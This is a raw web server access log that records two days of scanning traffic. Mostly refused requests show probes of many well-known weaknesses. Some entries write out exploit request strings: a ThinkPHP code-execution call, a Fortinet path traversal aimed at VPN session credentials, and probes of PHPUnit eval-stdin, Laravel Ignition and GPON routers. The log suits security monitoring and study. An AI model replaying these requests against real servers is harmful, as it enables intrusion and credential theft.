"/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Oct/2021:12:11:32 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:32 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:34 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:35 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Oct/2021:12:11:40 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:12:19:39 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:12:19:40 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:12:54:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.18] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [14/Oct/2021:12:58:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.205.24] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Oct/2021:16:25:10 +0000] 400 - HEAD http localhost "/" [Client 104.248.147.21] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:16:25:12 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 104.248.147.21] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:12 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 104.248.147.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:14 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 104.248.147.21] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:15 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 104.248.147.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:16 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 104.248.147.21] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:16 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 104.248.147.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:18 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 104.248.147.21] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:18 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 104.248.147.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:19 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 104.248.147.21] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [14/Oct/2021:16:25:20 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 104.248.147.21] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [14/Oct/2021:16:25:21 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 104.248.147.21] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:25:22 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 104.248.147.21] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [14/Oct/2021:16:32:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:03:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Oct/2021:17:37:38 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 181.214.206.201] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0" "-" [14/Oct/2021:17:52:30 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Oct/2021:19:00:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.253.92] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [14/Oct/2021:19:28:00 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:19:28:01 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:19:58:33 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:19:58:34 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:20:19:22 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [14/Oct/2021:21:49:00 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:21:49:00 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Oct/2021:22:03:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Oct/2021:23:19:18 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.77.162.24] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Oct/2021:23:41:19 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Oct/2021:23:56:25 +0000] 444 - GET https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:56:25 +0000] 444 - OPTIONS https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:56:25 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:56:25 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:30 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:56:30 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:30 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:31 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:31 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:31 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:56:31 +0000] 400 - - https localhost "-" [Client 50.31.21.10] [Length 154] [Gzip -] "-" "-" [14/Oct/2021:23:58:14 +0000] 444 - GET https localhost "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:58:14 +0000] 400 - GET http localhost "/" [Client 50.31.21.10] [Length 252] [Gzip -] "-" "-" [14/Oct/2021:23:58:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "-" "-" [14/Oct/2021:23:58:15 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1634255806" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.10] [Length 252] [Gzip -] "-" "-" [14/Oct/2021:23:58:15 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1634255806" [Client 50.31.21.10] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:15 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:15 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:15 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 50.31.21.10] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:15 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 50.31.21.10] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:16 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:16 +0000] 400 - HEAD http 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 50.31.21.10] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:18 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 50.31.21.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [14/Oct/2021:23:58:18 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 50.31.21.10] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [15/Oct/2021:00:35:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:00:39:38 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:00:39:38 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:00:50:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:01:22:51 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.197.56] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:02:33:02 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:03:07:34 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:03:07:34 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:03:48:26 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Oct/2021:04:23:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:04:56:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:04:58:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:04:59:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:05:40:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [15/Oct/2021:06:06:35 +0000] 400 - - https localhost "-" [Client 18.217.205.37] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:06:49:22 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:06:50:13 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:06:50:13 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:06:53:09 +0000] 400 - GET https localhost "/2cxO" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:06:53:40 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:42 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:42 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:46 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:48 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:48 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Oct/2021:06:53:48 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:52 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:52 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:06:53:56 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:07:04:10 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:07:24:09 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:07:36:45 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.96.130.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [15/Oct/2021:07:42:54 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 45.141.84.35] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [15/Oct/2021:07:52:04 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 45.134.144.8] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.42.2.el7.x86_64" "-" [15/Oct/2021:08:38:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:09:32:28 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:09:32:29 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:10:51:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.89] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:10:51:34 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:11:44:41 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [15/Oct/2021:12:04:19 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:12:04:19 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:12:58:34 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.200.130] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:13:20:08 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.86.143.66] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:13:54:28 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [15/Oct/2021:14:45:45 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:14:57:27 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 165.232.82.216] [Length 0] [Gzip -] "curl/7.3.2" "-" [15/Oct/2021:15:49:56 +0000] 400 - - https localhost "-" [Client 35.212.72.131] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:16:09:09 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 34.86.35.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [15/Oct/2021:16:52:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/" 